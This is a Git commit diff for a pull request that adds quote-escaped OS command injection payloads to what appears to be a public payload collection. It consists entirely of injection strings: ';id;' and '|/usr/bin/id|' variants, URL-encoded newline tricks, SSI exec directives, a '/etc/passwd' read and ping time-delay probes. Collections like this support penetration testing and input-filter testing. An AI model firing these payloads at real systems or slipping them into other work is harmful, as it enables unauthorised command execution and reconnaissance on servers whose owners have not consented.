Merge pull request #149 from ksg97031/patch-1

Add escaped double or single quote cases
This commit is contained in:
Swissky 2020-01-17 10:36:34 +01:00 committed by GitHub
commit 7920b4a124
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -3,19 +3,28 @@
<!--#exec%20cmd="/usr/bin/id;--> <!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="/usr/bin/id;--> <!--#exec%20cmd="/usr/bin/id;-->
/index.html|id| /index.html|id|
";id;"
';id;'
;id; ;id;
;id ;id
;netstat -a; ;netstat -a;
;id; "|id|"
'|id|'
|id |id
|/usr/bin/id |/usr/bin/id
|id| |id|
"|/usr/bin/id|"
'|/usr/bin/id|'
|/usr/bin/id| |/usr/bin/id|
"||/usr/bin/id|"
'||/usr/bin/id|'
||/usr/bin/id| ||/usr/bin/id|
|id; |id;
||/usr/bin/id; ||/usr/bin/id;
;id| ;id|
;|/usr/bin/id| ;|/usr/bin/id|
"\n/bin/ls -al\n"
'\n/bin/ls -al\n'
\n/bin/ls -al\n \n/bin/ls -al\n
\n/usr/bin/id\n \n/usr/bin/id\n
\nid\n \nid\n
@ -56,8 +65,12 @@ a|/usr/bin/id
%0Acat%20/etc/passwd %0Acat%20/etc/passwd
%0A/usr/bin/id %0A/usr/bin/id
%0Aid %0Aid
%22%0A/usr/bin/id%0A%22
%27%0A/usr/bin/id%0A%27
%0A/usr/bin/id%0A %0A/usr/bin/id%0A
%0Aid%0A %0Aid%0A
"& ping -i 30 127.0.0.1 &"
'& ping -i 30 127.0.0.1 &'
& ping -i 30 127.0.0.1 & & ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 & & ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a %0a ping -i 30 127.0.0.1 %0a